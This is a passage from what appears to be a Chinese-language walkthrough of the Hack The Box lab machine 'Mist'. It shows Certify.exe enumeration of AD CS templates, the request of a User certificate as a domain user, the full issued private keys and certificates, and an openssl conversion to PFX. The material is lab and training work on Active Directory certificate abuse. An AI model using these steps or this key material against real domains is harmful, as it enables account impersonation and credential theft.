MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : DirectoryEmailReplication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Directory Service Email Replication
mspki-certificate-application-policy : Directory Service Email Replication
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Domain Controllers S-1-5-21-1045809509-3006658589-2426055941-516
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
MIST\Enterprise Read-only Domain ControllersS-1-5-21-1045809509-3006658589-2426055941-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteOwner Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : KerberosAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Domain Controllers S-1-5-21-1045809509-3006658589-2426055941-516
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
MIST\Enterprise Read-only Domain ControllersS-1-5-21-1045809509-3006658589-2426055941-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteOwner Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Domain Users S-1-5-21-1045809509-3006658589-2426055941-513
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
WriteOwner Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : ComputerAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : Client Authentication, Server Authentication
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Domain Computers S-1-5-21-1045809509-3006658589-2426055941-515
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
WriteOwner Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : ManagerAuthentication
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_COMMON_NAME
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email, Server Authentication
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email, Server Authentication
Permissions
Enrollment Permissions
Enrollment Rights : MIST\Certificate Services S-1-5-21-1045809509-3006658589-2426055941-1132
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
WriteOwner Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : BackupSvcAuthentication
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_COMMON_NAME
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : MIST\CA Backup S-1-5-21-1045809509-3006658589-2426055941-1134
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Object Control Permissions
Owner : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
WriteOwner Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteDacl Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
WriteProperty Principals : MIST\Administrator S-1-5-21-1045809509-3006658589-2426055941-500
MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
这里我们只要关心CA的信息即可,模版随便选一个,这里就选择第一个User模版
[*] Listing info about the Enterprise CA 'mist-DC01-CA'
Enterprise CA Name : mist-DC01-CA
DNS Hostname : DC01.mist.htb
FullName : DC01.mist.htb\mist-DC01-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=mist-DC01-CA, DC=mist, DC=htb
Cert Thumbprint : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
Cert Serial : 3BF0F0DDF3306D8E463B218B7DB190F0
Cert Start Date : 2/15/2024 7:07:23 AM
Cert End Date : 2/15/2123 7:17:23 AM
Cert Chain : CN=mist-DC01-CA,DC=mist,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates MIST\Domain Admins S-1-5-21-1045809509-3006658589-2426055941-512
Allow ManageCA, ManageCertificates MIST\Enterprise Admins S-1-5-21-1045809509-3006658589-2426055941-519
Enrollment Agent Restrictions : None
[*] Available Certificates Templates :
CA Name : DC01.mist.htb\mist-DC01-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
使用User模版获取证书
Certify.exe request /ca:DC01\mist-DC01-CA /template:User
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ __| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : MIST\Brandon.Keywarp
[*] No subject name specified, using current context as subject.
[*] Template : User
[*] Subject : CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb
[*] Certificate Authority : DC01\mist-DC01-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 62
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA2k+00khOCyZxx3k1n+FlrcIicMLkt7MhXv9/KhXXKvGT5pDY
lXoXopMg0Xdk2D8AWvtHlZwGCEVv1mgBghbYtlD4VQrygfWZ+07v0wUK4PUpvU6+
fw9M1Uxjyu2td+pxbHg5mBEAJXYwBiXUUSyMU/1jrGwSgnBRv1rDFnAjvtvcJpXn
gGjpoEa3p3IpGN/p3mI1wDsWkJ3Bh7obh6T+zeEzP+tRtyXgMfyVbrfTiI0jOVh9
OwBJFl8l2l56TA1kyZU4mlStxMbsCX/Bc0QfwYlmV3htP9gru3058zjHBwX7eArm
yCVPD/lRxfDTMEC8BHtIjrT1BJQyYtsTzmXEoQIDAQABAoIBAQCD7qOCaXvwtR0R
xaiopJjEN4yExONgOPsz5Ag/sM9F/pS5RFP/kbdy4qN0s0jYfsqCMVWDjrT+jqgV
1OkEazYwiCJrkqAX9gtGmt/IkUWPydmdtFbfhqmSRgYQ/y5UR/Sf7tAvnCaQfSps
rLPxEpEDuSBhdTaCacqdcAZyKvcPQcWuy84IMJ4NpfypJz6OtxS08T/reNn0o5e4
7QMYxmE/jcELqsy2BSFjjNhNp5HPO8CBCYhu5JKfSLM+oOpQjAw+SVeMqMTslCnl
zyD7DRkCpF9bP9gtx+O3ilq+13/GRXLhV09kJsfL+r5/tk9quCQww4+wuIl93S/P
T51DCF85AoGBAPFoJB1o+5eESpvP0z5nEtsmNP+1sjD6Ep8Q08Hjdgmm+nYD3BoV
X3RCY0mbM4LJT9d/OfkaA3Pe44anJdKb3IVowhU3r1x46KQq1fVXz+sZUFThCCtW
YbAmJcSZcLMc/LHshGl/RHc2/p9MGiR3nuFCe/Jhy3yGqrhIB/xMwtH7AoGBAOeC
J5tl5EoXt/DgmxrmnIuBwLgmbUz4o5c/I7QBOY7R0e9sGTHcbWu2Nn5X0OaBSBQy
82Ta2a/EZS02EHU14g/7mz3SXJqf2aMB9hA+/ZwkYYswWgaxu46GjWOvKj51pMHD
naaDcCFLuAPP0CWbdUZzFy9DKJFPSqqyBsI4eF0TAoGAXMqh7ygWZSQ1pXSaB0eJ
aPFjt9K4frjxBXFrZACxs34akdhj9ya1/TMzhOyCPUhyRywhNY35O8W2AWEoWa8N
cb5Vs+AmqM3U5p2MhnTNd9nQFgA1qqrWe+X96Hbuafq/awi10PNZdtWNw991wQS1
7nImwIE0vVXqM1GEuEctL5cCgYAtrbWo6MLRh7qIcZjJBwWOVSy0aQiZ7llA53lg
8/jqYCX/CqIx/18rqIk6BpO2V33kVmVF2hSnpKWd9RPsPJR9ONTZrt8Mt0uW6TUm
4Xbizx7b+s9YkMsEBTJyn8ZDCq1WegVqLHb8atdFEUTtlq3eF6lUbvjbKvz9jyDc
Q44kNwKBgH68XFvyJlQ3mMOcPrLTYpXAB6Zxx7KP3dvDuIs7tBOxEIwKg/1/DCHJ
OQ6/iMkw5XYDFX7jOsH3MIjQp88wyqcRj2F4W0uL1bvofVG8Q/HhQHg05/kgq9Bw
35jO7qzco28Fdr25pibP6rzsqUYqKYf4twf6zGkyVOo4upc80ghK
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGDzCCBPegAwIBAgITIwAAAD4RkG+pPRMxpAAAAAAAPjANBgkqhkiG9w0BAQsF
ADBCMRMwEQYKCZImiZPyLGQBGRYDaHRiMRQwEgYKCZImiZPyLGQBGRYEbWlzdDEV
MBMGA1UEAxMMbWlzdC1EQzAxLUNBMB4XDTI1MDYwMjE1MjYzNVoXDTI2MDYwMjE1
MjYzNVowVTETMBEGCgmSJomT8ixkARkWA2h0YjEUMBIGCgmSJomT8ixkARkWBG1p
c3QxDjAMBgNVBAMTBVVzZXJzMRgwFgYDVQQDEw9CcmFuZG9uLktleXdhcnAwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaT7TSSE4LJnHHeTWf4WWtwiJw
wuS3syFe/38qFdcq8ZPmkNiVeheikyDRd2TYPwBa+0eVnAYIRW/WaAGCFti2UPhV
CvKB9Zn7Tu/TBQrg9Sm9Tr5/D0zVTGPK7a136nFseDmYEQAldjAGJdRRLIxT/WOs
bBKCcFG/WsMWcCO+29wmleeAaOmgRrencikY3+neYjXAOxaQncGHuhuHpP7N4TM/
61G3JeAx/JVut9OIjSM5WH07AEkWXyXaXnpMDWTJlTiaVK3ExuwJf8FzRB/BiWZX
eG0/2Cu7fTnzOMcHBft4CubIJU8P+VHF8NMwQLwEe0iOtPUElDJi2xPOZcShAgMB
AAGjggLpMIIC5TAXBgkrBgEEAYI3FAIECh4IAFUAcwBlAHIwKQYDVR0lBCIwIAYK
KwYBBAGCNwoDBAYIKwYBBQUHAwQGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDBE
BgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAw
BwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAyMh9sDV/18r4zCcVx1EOMe
cxJ0MB8GA1UdIwQYMBaAFAJHtA9/ZUDlwTbDIo9S3fMCAFUcMIHEBgNVHR8Egbww
gbkwgbaggbOggbCGga1sZGFwOi8vL0NOPW1pc3QtREMwMS1DQSxDTj1EQzAxLENO
PUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
b25maWd1cmF0aW9uLERDPW1pc3QsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlv
bkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBuwYI
KwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1taXN0LURD
MDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZp
Y2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWlzdCxEQz1odGI/Y0FDZXJ0aWZpY2F0
ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwMwYDVR0R
BCwwKqAoBgorBgEEAYI3FAIDoBoMGEJyYW5kb24uS2V5d2FycEBtaXN0Lmh0YjBP
BgkrBgEEAYI3GQIEQjBAoD4GCisGAQQBgjcZAgGgMAQuUy0xLTUtMjEtMTA0NTgw
OTUwOS0zMDA2NjU4NTg5LTI0MjYwNTU5NDEtMTExMDANBgkqhkiG9w0BAQsFAAOC
AQEAD860yPzQtf05S6zT+R5C7i/3Y76RUfwqKSA6sajG5jjHcDf0ZlyDrVwxHERC
JdNkji97483tWZB5fxHsIDxY4K0TbQ1x0flYE+8HMtQfGplF0IDHe/c7jNt+hQ1L
yym2UCE8TPyrmmydyUJH6lgK31gV+gGdzbe3YW36KDB+KJHhqxYqGhFqvK18HEbK
SkU55FWOM7tawUt21l4jX85oAae6XSDM7difIBhHUIs9JhdytZuoP07MDJ+R37gX
XJw3PJaUh5WYJvL/9OS1a/uv97h/poPemZqDOq7qMnP4Onz6jz7oXJ8J95whN0xS
DIaMtzi9LadwSa61puRwo0c4Sg==
-----END CERTIFICATE-----
#这里告诉我们怎么转换了
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:03.5638229
根据他输出最后的提示进行证书转换即可
复制CERTIFICATE 到一个 .pem 文件,然后转换证书格式
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# file Brandon.Keywrap.pem
Brandon.Keywrap.pem: PEM certificate
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# cat Brandon.Keywrap.pem
-----BEGIN CERTIFICATE-----
MIIGDzCCBPegAwIBAgITIwAAAD4RkG+pPRMxpAAAAAAAPjANBgkqhkiG9w0BAQsF
ADBCMRMwEQYKCZImiZPyLGQBGRYDaHRiMRQwEgYKCZImiZPyLGQBGRYEbWlzdDEV
MBMGA1UEAxMMbWlzdC1EQzAxLUNBMB4XDTI1MDYwMjE1MjYzNVoXDTI2MDYwMjE1
MjYzNVowVTETMBEGCgmSJomT8ixkARkWA2h0YjEUMBIGCgmSJomT8ixkARkWBG1p
c3QxDjAMBgNVBAMTBVVzZXJzMRgwFgYDVQQDEw9CcmFuZG9uLktleXdhcnAwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaT7TSSE4LJnHHeTWf4WWtwiJw
wuS3syFe/38qFdcq8ZPmkNiVeheikyDRd2TYPwBa+0eVnAYIRW/WaAGCFti2UPhV
CvKB9Zn7Tu/TBQrg9Sm9Tr5/D0zVTGPK7a136nFseDmYEQAldjAGJdRRLIxT/WOs
bBKCcFG/WsMWcCO+29wmleeAaOmgRrencikY3+neYjXAOxaQncGHuhuHpP7N4TM/
61G3JeAx/JVut9OIjSM5WH07AEkWXyXaXnpMDWTJlTiaVK3ExuwJf8FzRB/BiWZX
eG0/2Cu7fTnzOMcHBft4CubIJU8P+VHF8NMwQLwEe0iOtPUElDJi2xPOZcShAgMB
AAGjggLpMIIC5TAXBgkrBgEEAYI3FAIECh4IAFUAcwBlAHIwKQYDVR0lBCIwIAYK
KwYBBAGCNwoDBAYIKwYBBQUHAwQGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDBE
BgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAw
BwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAyMh9sDV/18r4zCcVx1EOMe
cxJ0MB8GA1UdIwQYMBaAFAJHtA9/ZUDlwTbDIo9S3fMCAFUcMIHEBgNVHR8Egbww
gbkwgbaggbOggbCGga1sZGFwOi8vL0NOPW1pc3QtREMwMS1DQSxDTj1EQzAxLENO
PUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
b25maWd1cmF0aW9uLERDPW1pc3QsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlv
bkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBuwYI
KwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1taXN0LURD
MDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZp
Y2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWlzdCxEQz1odGI/Y0FDZXJ0aWZpY2F0
ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwMwYDVR0R
BCwwKqAoBgorBgEEAYI3FAIDoBoMGEJyYW5kb24uS2V5d2FycEBtaXN0Lmh0YjBP
BgkrBgEEAYI3GQIEQjBAoD4GCisGAQQBgjcZAgGgMAQuUy0xLTUtMjEtMTA0NTgw
OTUwOS0zMDA2NjU4NTg5LTI0MjYwNTU5NDEtMTExMDANBgkqhkiG9w0BAQsFAAOC
AQEAD860yPzQtf05S6zT+R5C7i/3Y76RUfwqKSA6sajG5jjHcDf0ZlyDrVwxHERC
JdNkji97483tWZB5fxHsIDxY4K0TbQ1x0flYE+8HMtQfGplF0IDHe/c7jNt+hQ1L
yym2UCE8TPyrmmydyUJH6lgK31gV+gGdzbe3YW36KDB+KJHhqxYqGhFqvK18HEbK
SkU55FWOM7tawUt21l4jX85oAae6XSDM7difIBhHUIs9JhdytZuoP07MDJ+R37gX
XJw3PJaUh5WYJvL/9OS1a/uv97h/poPemZqDOq7qMnP4Onz6jz7oXJ8J95whN0xS
DIaMtzi9LadwSa61puRwo0c4Sg==
-----END CERTIFICATE-----
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# openssl pkcs12 -in Brandon.Keywrap.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out Brandon.Keywrap.pfx
Enter Export Password: #空密码即可
Verifying - Enter Export Password:
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# cat Brandon.Keywrap.pem
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA5C5RVcTJ4w4ISkdZ3nAYx4S14xnn25wmRahhk7ksdWApgP9n
e9GJ3UbkCIA629dxOSRaXB30gljtU2dnMGCxfokgU+Y3GkntdwaNIaQZOgznLotV
XnL9szbOwcu4K7NX97ox/vJOhhHGnrYpbEzX991qWi48WIy72teQ/g+hEHchDyUz
J3fD5qc4QeYaC1PBtYNJ5v+loWtKpReUIP38DMWqbffyfhplnGxCWS7expaPnTcc
+L3mDm6BPziJaambg+rCeJM8U8uQjbgRyT77PZcxUsPudcBEZv8izYxZvurvibp5
H2s1QVboyyfg0Sn+IJOWcH+Fo8L6tqa5K96N3QIDAQABAoIBAHlDuEv5mkVFttgq
1TLmpfSarcM0iEjo0logo0LLnTn/0e7RTSC7eiYTv6pY427kLzLsA+2Cqef/9Jhn
kqpeKNYTcA/GgDBDa6Te4XAocpOsOcw9li/ssrFkhjrt1kG7PRvVYy6XfW240rKU
Iq2ApSIAFL46Zi21FTy3ZUHv8mv5sqJ42Q5Z7tWvx9j2amv4L2DYdwzM56LY3BPg
n6MnGXF3YMoRqH7bjuuV3zI9D+051IXVCpIo87AbeScxc03gOrW/ARW6DtCRvvTu
/JTN0wSf13qLpOc+f4akm6olqN0Lor5CBKq/3ZDmVxpfjoi4VrQaeIx8s34hOGLi
kg7Gd60CgYEA+N7QiOTLDV13e18WP86yCuc5deW9XVBo5Wg6RxJSdbFM3eGGUOH9
Km0SPmk7q14QYz0Nu6WzqYp0ASiiFS9bTz3htoDSXOZvAoDYEG3o8Y6k1OYTvxdC
I1rLJqia5Xia+TiBDTpQNQ+N+Q8aVtqpmBDwJvmzyCUkFY5Bm6zE0NsCgYEA6rfE
7ZgZRilZn2f+3IygdGOjYFj9vvy4k/cCqIR3WUggoavvqTTFIEKYkTFMd72vbo1L
iJhRsFMmZNBpM9oytzgYGAYqhUAYTA4jwXDmCW4gWbeDJ4jdFoVqB1coR3wXDvpc
hsxiAjmP5h9krvvaesVMGHepTgAvSTU4rSVsnacCgYEAh3zObOiaPwF2jdzbgQtn
VJZDaxMS/91J7jLLH2wzJk3LOjSQajJOIK3Ws9GYoZgJNe3ELzdr005ED2lurDfm
7wISgsgpPlhZcTRx7KfZnMB6rkk/0NW5tQO1+6rpASqivDFt2KS5i9mXAlOdlFFg
6R+3jpB8tua5eV7ECxuI3ucCgYAVxYwHuecGQgmlJqFWVdkAUsmxwy9uSsTYPL5L
YVYsuusD9A3b9SAf2O2L8jW0mayvJX4PIonZQC08hrRrcd7obdSWTeQdzg8y5tDc
PZuo3kUz7TjGLwTK9P8bxTLgRptg8Uop2sVwjWRSpTDSplvirXBciKT0rkG0mbIz
JViI2wKBgQDlodC3Ac1CQjIud888kVwmK8GshAxK/o3K4W/j/sHMjCvNsWP8cmb6
/auYR67ZiSVTThWjzunQskG0trHjHnyFmEREUWx9bGTtCiM2nkU8nRMtKBS0TU9H
601qUe1lTU6/LuU47jxxcDiC/ZPfipf/kMdEZ6BWNdX8SwK76B3JNg==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGDzCCBPegAwIBAgITIwAAAD9ATHaVhun9FwAAAAAAPzANBgkqhkiG9w0BAQsF
ADBCMRMwEQYKCZImiZPyLGQBGRYDaHRiMRQwEgYKCZImiZPyLGQBGRYEbWlzdDEV
MBMGA1UEAxMMbWlzdC1EQzAxLUNBMB4XDTI1MDYwMjE1MzUxOFoXDTI2MDYwMjE1
MzUxOFowVTETMBEGCgmSJomT8ixkARkWA2h0YjEUMBIGCgmSJomT8ixkARkWBG1p
c3QxDjAMBgNVBAMTBVVzZXJzMRgwFgYDVQQDEw9CcmFuZG9uLktleXdhcnAwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDkLlFVxMnjDghKR1necBjHhLXj
GefbnCZFqGGTuSx1YCmA/2d70YndRuQIgDrb13E5JFpcHfSCWO1TZ2cwYLF+iSBT
5jcaSe13Bo0hpBk6DOcui1Vecv2zNs7By7grs1f3ujH+8k6GEcaetilsTNf33Wpa
LjxYjLva15D+D6EQdyEPJTMnd8PmpzhB5hoLU8G1g0nm/6Wha0qlF5Qg/fwMxapt
9/J+GmWcbEJZLt7Glo+dNxz4veYOboE/OIlpqZuD6sJ4kzxTy5CNuBHJPvs9lzFS
w+51wERm/yLNjFm+6u+JunkfazVBVujLJ+DRKf4gk5Zwf4Wjwvq2prkr3o3dAgMB
AAGjggLpMIIC5TAXBgkrBgEEAYI3FAIECh4IAFUAcwBlAHIwKQYDVR0lBCIwIAYK
KwYBBAGCNwoDBAYIKwYBBQUHAwQGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDBE
BgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAw
BwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFCmbHcRn/8Dq/kVKCSj1edSt
/UbtMB8GA1UdIwQYMBaAFAJHtA9/ZUDlwTbDIo9S3fMCAFUcMIHEBgNVHR8Egbww
gbkwgbaggbOggbCGga1sZGFwOi8vL0NOPW1pc3QtREMwMS1DQSxDTj1EQzAxLENO
PUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
